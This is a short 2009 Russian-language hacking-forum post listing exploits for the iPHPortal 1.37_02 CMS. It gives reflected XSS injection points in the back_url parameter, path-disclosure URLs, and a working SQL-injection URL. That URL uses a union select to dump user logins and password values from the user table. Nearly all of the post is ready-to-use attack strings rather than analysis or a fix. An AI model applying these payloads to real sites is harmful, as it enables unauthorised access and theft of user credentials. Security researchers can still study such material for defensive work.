28.01.2009, 04:10
|
|
Banned
Регистрация: 27.01.2009
Сообщений: 9
Провел на форуме:
96622
Репутация:
27
|
|
iPHPortal 1.37_02
Пасивная XSS
Код:
http://site/user/?back_url=/" [xss code]
http://site/user/?action=remind&back_url=/" [xss code]
Раскрытие путей
Код:
http://site/forums/?action=forum_add_message&forum_id[]=
http://site/include/func/db/common_db.inc.php?site=[]
http://site/include/func/db/split_sql_file.inc.php?site=[]
SQL-injection (нужны права админа)
Код:
http://site/admin/index.php?admin_url=rubric_edit.php?rubric_id=173+union+select+1,2,3,concat_ws(0x3a,user_login,user_password)+from+user+limit+0,1/*
Автор: iSee
Последний раз редактировалось iSee; 28.01.2009 в 04:12..
|
|
|